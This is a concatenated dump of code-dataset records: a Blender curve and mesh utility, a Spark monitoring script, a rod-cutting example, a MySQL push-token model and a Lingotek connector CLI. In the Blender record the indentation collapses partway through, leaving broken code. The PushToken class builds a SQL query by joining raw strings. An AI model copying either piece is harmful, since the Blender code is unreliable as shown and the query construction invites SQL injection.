bpy.types.Curve):\n    from_spline: bpy.types.Spline\n    from_point: bpy.types.SplinePoint\n    from_bezier_point: bpy.types.BezierSplinePoint\n\n    if len(to_curve.splines) > 0:\n        to_curve.splines.clear()\n\n    to_curve.dimensions = from_curve.dimensions\n    to_curve.resolution_u = from_curve.resolution_u\n    to_curve.resolution_v = from_curve.resolution_v\n\n    for from_spline in from_curve.splines:\n        to_spline: bpy.types.Spline = to_curve.splines.new(from_spline.type)\n        if to_spline.type == \"BEZIER\":\n            to_spline.bezier_points.add(len(from_spline.bezier_points) - 1)\n            for i, from_bezier_point in enumerate(from_spline.bezier_points):\n                to_spline.bezier_points[i].co = from_bezier_point.co\n                
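# every remaining attribute of the source control point is mirrored one-for-one below\n                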
to_spline.bezier_points[i].handle_left_type = from_bezier_point.handle_left_type\n to_spline.bezier_points[i].handle_left = from_bezier_point.handle_left\n to_spline.bezier_points[i].handle_right_type = from_bezier_point.handle_right_type\n to_spline.bezier_points[i].handle_right = from_bezier_point.handle_right\n to_spline.bezier_points[i].hide = from_bezier_point.hide\n to_spline.bezier_points[i].radius = from_bezier_point.radius\n to_spline.bezier_points[i].select_control_point = from_bezier_point.select_control_point\n to_spline.bezier_points[i].select_left_handle = from_bezier_point.select_left_handle\n to_spline.bezier_points[i].select_right_handle = from_bezier_point.select_right_handle\n to_spline.bezier_points[i].tilt = from_bezier_point.tilt\n to_spline.bezier_points[i].weight_softbody = from_bezier_point.weight_softbody\n else:\n to_spline.points.add(len(from_spline.points) - 1)\n for i, from_point in enumerate(from_spline.points):\n to_spline.points[i].co = from_point.co\n to_spline.points[i].hide = from_point.hide\n to_spline.points[i].tilt = from_point.tilt\n to_spline.points[i].weight = from_point.weight\n\n to_spline.hide = from_spline.hide\n to_spline.order_u = from_spline.order_u\n to_spline.order_v = from_spline.order_v\n to_spline.radius_interpolation = from_spline.radius_interpolation\n to_spline.resolution_u = from_spline.resolution_u\n to_spline.resolution_v = from_spline.resolution_v\n to_spline.tilt_interpolation = from_spline.tilt_interpolation\n to_spline.use_bezier_u = from_spline.use_bezier_u\n to_spline.use_bezier_v = from_spline.use_bezier_v\n to_spline.use_cyclic_u = from_spline.use_cyclic_u\n to_spline.use_cyclic_v = from_spline.use_cyclic_v\n to_spline.use_endpoint_u = from_spline.use_endpoint_u\n to_spline.use_endpoint_v = from_spline.use_endpoint_v\n to_spline.use_smooth = from_spline.use_smooth\n\n\ndef hash_mesh(hash_algo, mesh: bpy.types.Mesh):\n edge: bpy.types.MeshEdge\n vertex: bpy.types.MeshVertex\n loop: bpy.types.MeshLoop\n polygon: bpy.types.MeshPolygon\n\n for vertex in mesh.vertices:\n hash_algo.update(array(\"d\", [vertex.bevel_weight]))\n hash_algo.update(array(\"d\", vertex.co))\n hash_algo.update(array(\"d\", vertex.normal))\n\n for edge in mesh.edges:\n hash_algo.update(array(\"d\", [edge.bevel_weight, edge.crease, edge.crease]))\n hash_algo.update(array(\"l\", edge.vertices))\n hash_algo.update(array(\"l\", [edge.is_loose, edge.use_edge_sharp, edge.use_seam]))\n\n for loop in mesh.loops:\n hash_algo.update(array(\"l\", [loop.edge_index, loop.vertex_index]))\n hash_algo.update(array(\"d\", loop.normal))\n\n for polygon in mesh.polygons:\n hash_algo.update(array(\"d\", [polygon.loop_start, polygon.loop_total]))\n hash_algo.update(array(\"d\", polygon.normal))\n hash_algo.update(array(\"l\", [polygon.use_smooth]))\n hash_algo.update(array(\"l\", polygon.vertices))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"376850878","text":"from Class.Server import Server\nfrom Class.Master import Master\nfrom typing import List\nfrom datetime import datetime\nfrom os import mkdir\n\n\ndef main(job: str):\n # connect to master\n with open(\"conf/master-port\", \"r\") as f:\n master = Master(int(f.read()))\n\n # connect to slaves\n with open(\"conf/slave-ports\", \"r\") as f:\n ports: List[int] = [int(line) for line in f.readlines()]\n slaves: List[Server] = []\n for port in ports:\n print(\"\")\n slave = 
Server(port)\n slaves.append(slave)\n\n # start monitor on each slave\n for slave in slaves:\n slave.start_monitor(interval=0.01)\n\n # send command to master to start the job\n master.get_connection().run(\"source /etc/profile && cd $SPARK_HOME && \" + job)\n\n # job is done, stop monitors, the slaves will write data to their own disks\n for slave in slaves:\n slave.stop_monitor()\n\n # collect data to \"./monitor_data/\"\n current_time = str(datetime.now())[:-7]\n folder_name = input(\"Please input the folder name (default: {current_time}):\\n\".format(current_time=current_time))\n folder_name = folder_name if folder_name else current_time\n folder_path = \"./monitor_data/\" + folder_name\n mkdir(folder_path)\n i: int = 1\n for slave in slaves:\n slave.get_connection().get(slave.get_log_path(), \"{folder_path}/slave{i}.csv\".format(folder_path=folder_path,\n i=i))\n i += 1\n\n\nif __name__ == '__main__':\n job: str = \"bin/spark-submit --class org.apache.spark.examples.SparkPi --master spark://192.168.0.200:7077 \" \\\n \"--executor-memory 2g ./examples/jars/spark-examples_2.11-2.4.5.jar 10000\"\n main(job)\n","sub_path":"star_job.py","file_name":"star_job.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359531570","text":"# coding:utf-8\n\ndef rod_cutting(n, p):\n p.insert(0, 0)\n best_price = [0] # best_price[i]:best price of i length\n first_part = [0] # first_part[i]:first length of i legth\n\n for i in range(1, n+1):\n best_price.append(0)\n first_part.append(0)\n for j in range(1, i+1):\n if best_price[i] < p[j] + best_price[i-j]:\n best_price[i] = p[j] + best_price[i-j]\n first_part[i] = j\n\n return best_price, first_part\n\ndef main():\n n = 10\n p = [1,3,8,8,9,10,18,18,23,25]\n (r, c) = rod_cutting(n, p)\n # show result\n print(\" i|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(i), end=\"\")\n print()\n print(\"p[i]|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(p[i]), end=\"\")\n print()\n print(\"r[i]|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(r[i]), end=\"\")\n print()\n print(\"c[i]|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(c[i]), end=\"\")\n print()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"DP/Rod_Cutting.py","file_name":"Rod_Cutting.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"611065320","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n# copyright 2016 Wshuai, Inc.\n# All Rights Reserved.\n\n# @author: WShuai Inc.\n\nimport types\nimport datetime\nfrom Model import Model\n\nclass PushToken(Model):\n def __init__(self, mysql_handler, LOG):\n super(Model, self).__init__()\n self.mysql_handler = mysql_handler\n self.LOG = LOG\n self.id = None\n self.table_name = 'TBL_PUSH_TOKEN'\n self.table_field = [\n { 'name': 'id', 'type': 'int' },\n { 'name': 'user_phone', 'type': 'string' },\n { 'name': 'user_ios_token', 'type': 'string' },\n { 'name': 'user_android_token', 'type': 'string' }\n ]\n self.table_data = {}\n self.table_data_multi = []\n return\n\n def add_token(self, value):\n (ret, num, id) = self.mysql_handler.insert_to_db(self.table_name, value)\n if ret:\n self.LOG.debug('add push token success, id is [%d].' 
% id)\n elif not ret and num == 1062:\n self.LOG.debug('add push token failed, duplicate key.')\n return ret, id\n \n\n def get_token(self, user_phone):\n condition_map = {\n 'user_phone': user_phone\n }\n condition = self.generate_condition(condition_map)\n if not self.get_model(condition):\n return None\n else:\n self.generate_one_result_from_mysql()\n return self.table_data\n\n def get_tokens(self, user_phones):\n condition = [\n {\n 'name': 'user_phone',\n 'relation': 'in',\n 'value': '(\\'%s\\')' % '\\',\\''.join(user_phones),\n 'has_comma': False\n }\n ]\n if not self.get_model(condition):\n return None\n else:\n self.generate_multi_result_from_mysql()\n return self.table_data_multi\n\n def update_token(self, user_phone, modify_info):\n condition_map = {\n 'user_phone': user_phone\n }\n condition = self.generate_condition(condition_map)\n value = self.generate_value(modify_info)\n (ret, num) = self.mysql_handler.update_to_db([self.table_name], condition, value)\n if ret: \n return True\n else:\n return False\n","sub_path":"src/model/PushToken.py","file_name":"PushToken.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"637911404","text":"''' Python Dependencies '''\nimport click\nimport ctypes\nimport logging\nimport os\nimport subprocess\nimport sys\n\n''' Internal Dependencies '''\nfrom ltk import __version__\nfrom ltk.actions import *\nfrom ltk.constants import LOG_FN, CONF_DIR, METADATA_FIELDS\nfrom ltk.exceptions import UninitializedError, ResourceNotFound, RequestFailedError, AlreadyExistsError\nfrom ltk.logger import logger, API_LOG_LEVEL, API_RESPONSE_LOG_LEVEL, CustomFormatter\nfrom ltk.utils import remove_powershell_formatting\nfrom ltk.watch import WatchAction\n\n''' Globals '''\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\nHIDDEN_ATTRIBUTE = 0x02\npython_version = sys.version\n# Python 3\n# # if python_version[0] < '3':\n# # print('Python 3 is required to run this version of the Lingotek Filesystem connector.\\n\\nFor other versions and troubleshooting, see: https://github.com/lingotek/filesystem-connector')\n# # exit()\n# End Python 3\n\n\ndef abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()\n\ndef init_logger(path):\n \"\"\"\n Initializes logger based on path\n \"\"\"\n logger.setLevel(logging.DEBUG)\n if not path:\n file_handler = logging.FileHandler(LOG_FN)\n else:\n try:\n file_handler = logging.FileHandler(os.path.join(path, CONF_DIR, LOG_FN))\n\n # if on Windows system, set directory properties to hidden\n if os.name == 'nt':\n try:\n subprocess.call([\"attrib\", \"+H\", os.path.join(path, CONF_DIR)])\n except Exception as e:\n logger.error(\"Error on init: \"+str(e))\n # logger.info(\"On Windows, make .ltk folder hidden\")\n # # Python 2\n ret = ctypes.windll.kernel32.SetFileAttributesW(unicode(os.path.join(path, CONF_DIR)), HIDDEN_ATTRIBUTE)\n # # End Python 2\n # # Python 3\n# # ret = ctypes.windll.kernel32.SetFileAttributesW(os.path.join(path, CONF_DIR), HIDDEN_ATTRIBUTE)\n # # End Python 3\n # if(ret != 1): # return value of 1 signifies success\n # pass\n except IOError as e:\n #logger.info(e)\n # todo error check when running init without existing conf dir\n try:\n os.mkdir(os.path.join(path, CONF_DIR))\n # if on Windows system, make directory hidden\n if os.name == 'nt':\n logger.info(\"On Windows, make .ltk folder hidden\")\n # Python 2\n ret = ctypes.windll.kernel32.SetFileAttributesW(unicode(os.path.join(path, CONF_DIR)), 
HIDDEN_ATTRIBUTE)\n # End Python 2\n # Python 3\n# ret = ctypes.windll.kernel32.SetFileAttributesW(os.path.join(path, CONF_DIR), HIDDEN_ATTRIBUTE)\n # End Python 3\n if(ret != 1): # return value of 1 signifies success\n pass\n except IOError as e:\n print(e.errno)\n print(e)\n\n file_handler = logging.FileHandler(os.path.join(path, CONF_DIR, LOG_FN))\n\n console_handler = logging.StreamHandler(sys.stdout)\n file_handler.setLevel(API_LOG_LEVEL)\n file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))\n if quiet:\n console_handler.setLevel(logging.WARNING)\n elif verbosity:\n if verbosity > 1:\n console_handler.setLevel(API_RESPONSE_LOG_LEVEL)\n else:\n console_handler.setLevel(API_LOG_LEVEL)\n else:\n console_handler.setLevel(logging.INFO)\n custom_formatter = CustomFormatter()\n console_handler.setFormatter(custom_formatter)\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n\ndef print_log(error):\n \"\"\"\n Prints the error before logger is initialized\n \"\"\"\n # if not len(logger.handlers):\n print ('Error: {0}'.format(error))\n sys.exit()\n return\n\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n# Python 2\n@click.version_option(version=__version__, message='%(prog)s version %(version)s (Lingotek Filesystem Connector - Python 2)')\n# End Python 2\n# Python 3\n# @click.version_option(version=__version__, message='%(prog)s version %(version)s (Lingotek Filesystem Connector - Python 3)')\n# End Python 3\n@click.option('-q', 'is_quiet', flag_value=True, help='Will only show warnings')\n@click.option('-v', 'verbosity_lvl', count=True, help='Show API calls. Use -vv for API responses.')\ndef ltk(is_quiet, verbosity_lvl):\n global quiet, verbosity\n quiet = is_quiet\n verbosity = verbosity_lvl\n\n\n@ltk.command()\n@click.option('--access_token', help='Your access token')\n@click.option('--host', default='myaccount.lingotek.com', # type=click.Choice(['myaccount.lingotek.com', 'cms.lingotek.com', 'clone.lingotek.com']),\n help='Default environment: myaccount.lingotek.com')\n@click.option('--client_id', help='This is an advanced option that should only be used for clients that have been issued a specified client_id for analytics')\n@click.option('--path', type=click.Path(exists=True),\n help='The path to the project directory to be initialized; defaults to the current directory')\n@click.option('-n', '--project_name', help='The preferred project name, defaults to the current directory name')\n@click.option('-w', '--workflow_id', default='c675bd20-0688-11e2-892e-0800200c9a66',\n help='The id of the workflow to use for this project; defaults to machine translate only')\n@click.option('-b', '--browser', flag_value=True, help='Launches broswer for Authentication')\n@click.option('-l', '--locale', default='en_US', help='The default source locale for the project; defaults to en_US')\n@click.option('-d', '--delete', flag_value=True, # expose_value=False, callback=abort_if_false,\n # prompt='Are you sure you want to delete the current project remotely and re-initialize? '\n # 'Use the -c flag if you only want to change the project.',\n help='Delete the current project remotely and re-initialize')\n# todo add a 'change' option so don't delete remote project\n# @click.option('-c', '--change', flag_value=True, help='Change the Lingotek project. 
')\n@click.option('--reset', flag_value=True, help='Reauthorize and reset any stored access tokens')\ndef init(host, access_token, client_id, path, project_name, workflow_id, locale, browser, delete, reset):\n \"\"\" Connects a local project to Lingotek \"\"\"\n try:\n host = 'https://' + host\n if not path:\n path = os.getcwd()\n if not project_name:\n project_name = os.path.basename(os.path.normpath(path))\n init_logger(path)\n\n init = init_action.InitAction(os.getcwd())\n init.init_action(host, access_token, client_id, path, project_name, workflow_id, locale, browser, delete, reset)\n\n if(init.turn_clone_on == False):\n # set the download option in config\n config = config_action.ConfigAction(os.getcwd())\n config.set_clone_option('off', print_info=False)\n\n except (ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command()\n#TO-DO: @click.option('-a', '--all', help='List all configuration settings (including access token)')\n@click.option('-l', '--locale', help='Change the default source locale for the project')\n@click.option('-w', '--workflow_id', is_flag=False, flag_value=\"project default\", help='Change the workflow id for the project')\n@click.option('-ld', '--latest_document', help='Toggle always get latest document option \\'on\\' and \\'off\\'')\n@click.option('-c', '--clone_option', help='Toggle clone download option \\'on\\' and \\'off\\'. Turning clone \\'on\\': Translations will be downloaded to a cloned folder structure, where the root folder for each locale is the locale folder specified in config or a locale folder inside of the default download folder. If a default download folder is not set, then translations will be downloaded to the directory where the project was initialized.' +\n 'Turning clone \\'off\\': Downloaded translations will go into their locale folder (if specified) or default download folder, but not in a cloned folder structure. If no default download folder or locale folder is specified, downloaded translations will go to the same folder as their corresponding source files.')\n@click.option('-ff', '--finalized_file', help='Toggle finalized file download option \\'on\\' and \\'off\\'. Turning finalized file on downloads the finalized file instead of the raw translation.\\\n A finalized file is typically a file that has undergone some sort of post editing like Desktop Publishing after the translation has compeleted.')\n@click.option('-u', '--unzip_file', help='Toggle finalized file UNZIP option \\'on\\' and \\'off\\'. With this option \\'on\\' contents of the finalized file will be placed in the expected directory.')\n@click.option('-d', '--download_folder',\n help='Specify a default folder for where downloaded translations should go. Use --none to remove the download folder. Using --none will cause downloaded translations to download to the same folder as their corresponding source files.')\n@click.option('-t', '--target_locales', multiple=True,\n help='Specify target locales that documents in watch_folder should be assigned; may either specify '\n 'with multiple -t flags (ex: -t locale -t locale) or give a list separated by commas and no spaces '\n '(ex: -t locale,locale)')\n\n@click.option('-p', '--locale_folder', nargs=2, type=str, multiple=True, help='For a specific locale, specify the root folder where downloaded translations should appear. Use --none for the path to clear the download folder for a specific locale. Example: -p fr_FR translations/fr_FR. 
Note: This only works with clone option \\'on\\'')\n@click.option('-r', '--remove_locales', flag_value=True, help='Remove all locale folders and use the default download location instead.')\n@click.option('-g', '--git', help='Toggle Git auto-commit option on and off')\n@click.option('-gu', '--git_credentials', is_flag=True, help='Open prompt for Git credentials for auto-fill (\\'none\\' to unset); only enabled for Mac and Linux')\n@click.option('-a', '--append_option', help='Change the format of the default name given to documents on the Lingotek system. Define file information to append to document names as none, full, number:+a number of folders down to include (e.g. number:2), or name:+a name of a directory to start after if found in file path (e.g. name:dir). Default option is none.')\n@click.option('-f', '--auto_format', help='Toggle auto format option \\'on\\' and \\'off\\'. Applies formatting during download.')\n@click.option('-md', '--metadata_defaults', is_flag=True, help='Launch the metadata wizard to set the default metadata that will be sent with every document.')\n@click.option('-mp', '--metadata_prompt', help='Toggle prompting for metadata with every add and push. Use the argument \\'on\\' to enable this prompt or \\'off\\' to disable it.')\n@click.option('-mf', '--metadata_fields', help=\"Set the fields that the metadata wizard will use when adding or pushing documents. All default metadata will still be sent. Enter the fields to prompt for as a comma-separated list with no spaces, or enter 'all' to include all the fields. Valid fields are: \"+', '.join(str(field) for field in METADATA_FIELDS))\n\ndef config(**kwargs):\n \"\"\" View or change local configuration \"\"\"\n try:\n action = config_action.ConfigAction(os.getcwd())\n init_logger(action.path)\n for f in kwargs:\n if kwargs[f]:\n temp = remove_powershell_formatting(kwargs[f])\n kwargs[f] = temp\n action.config_action(**kwargs)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Add files and folders\")\n@click.argument('file_names', required=True, nargs=-1)\n@click.option('-d', '--directory', flag_value=True, help='Only add directories, not files inside directories')\n@click.option('-l', '--locale', help='If source locale is different from the default configuration. Use ltk list -l to see possible locales')\n@click.option('-f', '--format',\n help=\"Format of file; if not specified, will use extension to detect; defaults to plaintext. Use ltk list -f to see possible formats. Files may not be added to Lingotek's system if not formatted correctly according to the specified format\")\n@click.option('-D', '--download_folder', type=click.Path(exists=True), help='Download folder for the translations for this file. 
If set, it will take precedence over locale folders and the default download folder and will ignore clone as well as the no_ext argument when pulling/downloading')\n@click.option('-o', '--overwrite', flag_value=True, help='Overwrite previously added file if the file has been modified')\n@click.option('-s', '--srx', type=click.Path(exists=True), help='srx file')\n@click.option('-si', '--srx_id', help='srx id')\n@click.option('-i', '--its', type=click.Path(exists=True), help='its file')\n@click.option('-ii', '--its_id', help='its id')\n@click.option('-c', '--charset', help='File encoding')\n@click.option('-ff', '--fprm', type=click.Path(exists=True), help='fprm file')\n@click.option('-fi', '--fprm_id', help='fprm id')\n@click.option('-fs', '--fprm_subfilter', type=click.Path(exists=True), help='fprm subfilter file')\n@click.option('-fsi', '--fprm_subfilter_id', help='fprm subfilter id')\n@click.option('-v', '--vault_id', help='Save-to TM vault id')\n@click.option('-e', '--external_url', help='Source url')\n@click.option('--due_date', help='Due date (as Unix timestamp, in milliseconds)')\n@click.option('--due_reason', help='Reason for due date')\n@click.option('-m', '--metadata', flag_value=True, help=\"Launches the metadata wizard\")\n\n# # Metadata - optional parameters\n# @click.option('--author_email', help='Author email')\n# @click.option('--author_name', help='Author name')\n# @click.option('--business_division', help='Business division')\n# @click.option('--business_unit', help='Business unit')\n# @click.option('--campaign_id', help='Campaign ID')\n# @click.option('--campaign_rating', help='Campaign rating')\n# @click.option('--channel', help='Channel')\n# @click.option('--contact_email', help='Contact email')\n# @click.option('--contact_name', help='Contact name')\n# @click.option('--content_description', help='Content description')\n# @click.option('--content_type', help='Content type')\n# @click.option('--domain', help='Domain')\n# @click.option('--external_application_id', help='External application ID')\n# @click.option('--external_document_id', help='External document ID')\n# @click.option('--external_style_id', help='External style ID')\n# @click.option('--job_id', help='Job ID')\n# @click.option('--purchase_order', help='Purchase Order')\n# @click.option('--reference_url', help='Reference URL')\n# @click.option('--region', help='Region')\n# @click.option('--require_review', help='Require review')\n# @click.option('--category_id', help='Category ID')\n# @click.option('--note', help='Note')\n\n# Metadata - optional parameters\n@click.option('--author_email', hidden=True)\n@click.option('--author_name', hidden=True)\n@click.option('--business_division', hidden=True)\n@click.option('--business_unit', hidden=True)\n@click.option('--campaign_id', hidden=True)\n@click.option('--campaign_rating', hidden=True)\n@click.option('--channel', hidden=True)\n@click.option('--contact_email', hidden=True)\n@click.option('--contact_name', hidden=True)\n@click.option('--content_description', hidden=True)\n@click.option('--content_type', hidden=True)\n@click.option('--domain', hidden=True)\n@click.option('--external_application_id', hidden=True)\n@click.option('--external_document_id', hidden=True)\n@click.option('--external_style_id', hidden=True)\n@click.option('--job_id', hidden=True)\n@click.option('--purchase_order', hidden=True)\n@click.option('--reference_url', hidden=True)\n@click.option('--region', hidden=True)\n@click.option('--require_review', hidden=True)\n@click.option('--category_id', 
hidden=True)\n@click.option('--note', hidden=True)\n\ndef add(file_names, **kwargs):\n #\"\"\" Add files and folders for upload to Lingotek. Fileglobs (e.g. *.txt) can be used to add all matching files and/or folders. Added folders will automatically add the new files added or created inside of them. \"\"\"\n \"\"\" Add files and folders for upload to Lingotek. Fileglobs (e.g. *.txt) can be used to add all matching files and/or folders. Added folders will automatically add the new files added or created inside of them.\n \n Metadata can be added by launching the metadata wizard with the -m flag or by using flags for specific metadata. The metadata flags are --author_email, --author_name, --business_division, --business_unit, --campaign_id, --campaign_rating, --channel, --contact_email, --contact_name, --content_description, --content_type, --domain, --external_application_id, --external_document_id, --external_style_id, --job_id, --purchase_order, --reference_url, --region, --require_review, --category_id, and --note \"\"\"\n try:\n action = add_action.AddAction(os.getcwd())\n init_logger(action.path)\n\n file_names = remove_powershell_formatting(file_names)\n\n for f in kwargs:\n if kwargs[f]:\n temp = remove_powershell_formatting(kwargs[f])\n kwargs[f] = temp\n\n action.add_action(file_names, **kwargs)\n except (UninitializedError, RequestFailedError, ResourceNotFound, AlreadyExistsError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Sends updated content to Lingotek for documents that have been added; defaults to the entire project.\")\n@click.option('-n', '--test', 'test', flag_value=True, help='Shows which files will be added or updated without actually uploading any content')\n@click.option('-t', '--title', 'title', flag_value=True, help='Display document titles rather than file paths')\n@click.argument('files', type=click.Path(exists=True), required=False, nargs=-1)\n@click.option('--due_date', help='Due date (as Unix timestamp, in milliseconds)')\n@click.option('--due_reason', help='Reason for due date')\n@click.option('-m', '--metadata', flag_value=True, help=\"Launches the metadata wizard\")\n@click.option('-o', '--metadata-only', 'metadata_only', flag_value=True, help=\"Only updates the metadata and due date/due reason and does not update the document contents\")\n\n# # Metadata - optional parameters\n# @click.option('--author_email', help='Author email')\n# @click.option('--author_name', help='Author name')\n# @click.option('--business_division', help='Business division')\n# @click.option('--business_unit', help='Business unit')\n# @click.option('--campaign_id', help='Campaign ID')\n# @click.option('--campaign_rating', help='Campaign rating')\n# @click.option('--channel', help='Channel')\n# @click.option('--contact_email', help='Contact email')\n# @click.option('--contact_name', help='Contact name')\n# @click.option('--content_description', help='Content description')\n# @click.option('--content_type', help='Content type')\n# @click.option('--domain', help='Domain')\n# @click.option('--external_application_id', help='External application ID')\n# @click.option('--external_document_id', help='External document ID')\n# @click.option('--external_style_id', help='External style ID')\n# @click.option('--job_id', help='Job ID')\n# @click.option('--purchase_order', help='Purchase Order')\n# @click.option('--reference_url', help='Reference URL')\n# @click.option('--region', help='Region')\n# @click.option('--require_review', help='Require review')\n# 
@click.option('--category_id', help='Category ID')\n# @click.option('--note', help='Note')\n\n# Metadata - optional parameters\n@click.option('--author_email', hidden=True)\n@click.option('--author_name', hidden=True)\n@click.option('--business_division', hidden=True)\n@click.option('--business_unit', hidden=True)\n@click.option('--campaign_id', hidden=True)\n@click.option('--campaign_rating', hidden=True)\n@click.option('--channel', hidden=True)\n@click.option('--contact_email', hidden=True)\n@click.option('--contact_name', hidden=True)\n@click.option('--content_description', hidden=True)\n@click.option('--content_type', hidden=True)\n@click.option('--domain', hidden=True)\n@click.option('--external_application_id', hidden=True)\n@click.option('--external_document_id', hidden=True)\n@click.option('--external_style_id', hidden=True)\n@click.option('--job_id', hidden=True)\n@click.option('--purchase_order', hidden=True)\n@click.option('--reference_url', hidden=True)\n@click.option('--region', hidden=True)\n@click.option('--require_review', hidden=True)\n@click.option('--category_id', hidden=True)\n@click.option('--note', hidden=True)\n\ndef push(test, title, files, metadata, metadata_only, **kwargs):\n #\"\"\" Sends updated content to Lingotek for documents that have been added. Fileglobs (e.g. *.txt) can be used to push all matching files \"\"\"\n \"\"\" Sends updated content to Lingotek for documents that have been added. Fileglobs (e.g. *.txt) can be used to push all matching files\n\n Metadata can be updated by launching the metadata wizard with the -m flag or by using flags for specific metadata. The metadata flags are --author_email, --author_name, --business_division, --business_unit, --campaign_id, --campaign_rating, --channel, --contact_email, --contact_name, --content_description, --content_type, --domain, --external_application_id, --external_document_id, --external_style_id, --job_id, --purchase_order, --reference_url, --region, --require_review, --category_id, and --note \"\"\"\n try:\n action = push_action.PushAction(os.getcwd(), test, title)\n init_logger(action.path)\n action.push_action(files=files, set_metadata=metadata, metadata_only=metadata_only, **kwargs)\n except UninitializedError as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Add targets to document(s) to start translation; defaults to the entire project. Use ltk list -l to see possible locales\")\n@click.option('-n', '--doc_name', help='The name of the document for which to request target locale(s)')\n@click.option('-p', '--path', type=click.Path(exists=True), help='The file name or directory for which to request target locale(s)')\n@click.option('-c', '--cancel', 'to_cancel', flag_value=True, help='Cancels a specified target locale')\n@click.option('-d', '--delete', 'to_delete', flag_value=True, help='Deletes a specified target locale')\n@click.option('--due_date', help='The due date of the translation')\n@click.option('-w', '--workflow', help='The workflow of the translation (Use \"ltk list -w\" to see available workflows)')\n@click.argument('locales', required=False, nargs=-1) # can have unlimited number of locales\ndef request(doc_name, path, locales, to_cancel, to_delete, due_date, workflow):\n \"\"\" Add targets to document(s) to start translation; defaults to the entire project. If no locales are specified, Filesystem Connector\n will look for target watch locales set in ltk config. Use ltk list -l to see possible locales. 
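# --- Editor's note: illustrative sketch, not part of the original file. ---
# The `add` and `push` commands above each repeat the same block of ~22 hidden
# metadata options. One way to factor that duplication into a single reusable
# decorator; `METADATA_FIELDS` and `metadata_options` are hypothetical names,
# not part of the Lingotek client:
import click

METADATA_FIELDS = [
    'author_email', 'author_name', 'business_division', 'business_unit',
    'campaign_id', 'campaign_rating', 'channel', 'contact_email',
    'contact_name', 'content_description', 'content_type', 'domain',
    'external_application_id', 'external_document_id', 'external_style_id',
    'job_id', 'purchase_order', 'reference_url', 'region', 'require_review',
    'category_id', 'note',
]

def metadata_options(command):
    # Attach every hidden metadata option in one place; reversed() preserves
    # the original top-to-bottom order because decorators apply bottom-up.
    for field in reversed(METADATA_FIELDS):
        command = click.option('--' + field, hidden=True)(command)
    return command
# Usage: place @metadata_options under @ltk.command(...) in place of the
# repeated @click.option(..., hidden=True) lines.
# --- end editor's note ---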
\"\"\"\n try:\n action = request_action.RequestAction(os.getcwd(), doc_name, path, locales, to_cancel, to_delete, due_date, workflow)\n init_logger(action.path)\n if locales and isinstance(locales,str):\n locales = [locales]\n\n doc_name = remove_powershell_formatting(doc_name)\n path = remove_powershell_formatting(path)\n\n action.target_action()\n except (UninitializedError, ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n# todo add a --all option to see all document ids once only show relative to cwd is implemented\n@ltk.command(name='list', short_help='Shows docs (default), workflows, locales, formats, or filters')\n@click.option('-t', '--title', 'title', flag_value=True, help='List document titles and folder paths from project root instead of relative file paths')\n@click.option('-c', '--hide_docs', 'hide_docs', flag_value=True, help='Collapse down to list only added directories instead of both directories and documents.')\n@click.option('-w', '--workflows', 'id_type', flag_value='workflow', help='List available workflows')\n@click.option('-l', '--locales', 'id_type', flag_value='locale', help='List supported locale codes')\n@click.option('-f', '--formats', 'id_type', flag_value='format', help='List supported formats')\n@click.option('-r', '--remote', 'id_type', flag_value='remote', help='List all project documents on Lingotek Cloud')\n@click.option('--filters', 'id_type', flag_value='filter', help='List default and custom filters')\n@click.option('-d', '--download_folder', 'show_dests', flag_value=True, help=\"Show target download folders for files that have had them set\")\ndef list(**kwargs):\n \"\"\" Shows docs, workflows, locales, formats, or filters. By default lists added folders and docs. \"\"\"\n try:\n action = list_action.ListAction(os.getcwd())\n init_logger(action.path)\n action.list_action(**kwargs)\n\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Gets the status of a specific document or all documents\")\n@click.option('-n', '--doc_name', help='Specific document name to get status of')\n@click.option('-d', '--detailed', flag_value=True, help='Detailed status of each locale for the document')\n@click.option('-a', '--all', flag_value=True, help='List all project documents on Lingotek Cloud')\ndef status(**kwargs):\n \"\"\" Gets the status of a specific document or all documents \"\"\"\n try:\n action = status_action.StatusAction(os.getcwd())\n init_logger(action.path)\n\n for f in kwargs:\n if kwargs[f]:\n temp = remove_powershell_formatting(kwargs[f])\n kwargs[f] = temp\n\n action.get_status(**kwargs)\n except (UninitializedError, ResourceNotFound) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help='Download specified translations')\n@click.option('-a', '--auto_format', flag_value=True, help='Flag to auto apply formatting during download')\n@click.option('-l', '--locales', help=\"Specify locales to download (defaults to all target locales for the document). For multiple locales give a list separated by commas and no spaces (ex: en_US,en_GB).\")\n@click.option('-e', '--locale_ext', flag_value=True, help=\"Specifies to add the name of the locale as an extension to the file name (ex: doc1.fr_FR.docx). This is the default unless the clone download option is active.\")\n@click.option('-n', '--no_ext', flag_value=True, help=\"Specifies to not add the 